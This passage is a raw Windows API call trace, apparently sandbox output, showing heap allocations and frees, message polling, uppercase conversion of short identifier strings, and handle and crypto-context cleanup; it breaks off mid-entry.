RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0256.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.036] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0256.036] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.036] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0256.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0256.036] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0256.036] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0256.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0256.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0256.036] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0256.036] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0256.036] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0256.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0256.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0256.037] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0256.037] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0256.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0256.038] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.038] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0256.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0256.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0256.038] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.039] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0256.039] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0256.039] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.039] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.039] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.039] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.039] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.039] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0256.039] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.039] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0256.039] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.039] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.039] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0256.041] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.041] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0256.041] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.041] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.041] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.041] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.041] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.041] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.042] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.042] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.042] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.042] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.042] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.042] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.042] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.042] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.042] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.042] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0256.042] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.042] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0256.042] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.042] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.042] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.042] CryptReleaseContext (hProv=0xad2698, dwFlags=0x0) returned 1 [0256.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0256.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0256.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0256.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0256.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0256.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0256.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0256.044] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.044] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0256.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.044] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.045] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0256.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0256.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.045] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0256.045] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0256.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0256.046] FreeLibrary (hLibModule=0x74d40000) returned 1 [0256.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0256.046] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0256.046] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0256.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.046] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0256.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0256.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0256.046] CloseHandle (hObject=0x2a0) returned 1 [0256.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0256.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0256.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0256.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0256.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0256.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0256.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0256.047] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0256.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0256.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0256.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0256.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0256.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0256.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0256.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e88 [0256.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0256.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0256.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.055] CloseHandle (hObject=0x2d0) returned 1 [0256.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0256.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.061] HeapFree (in: 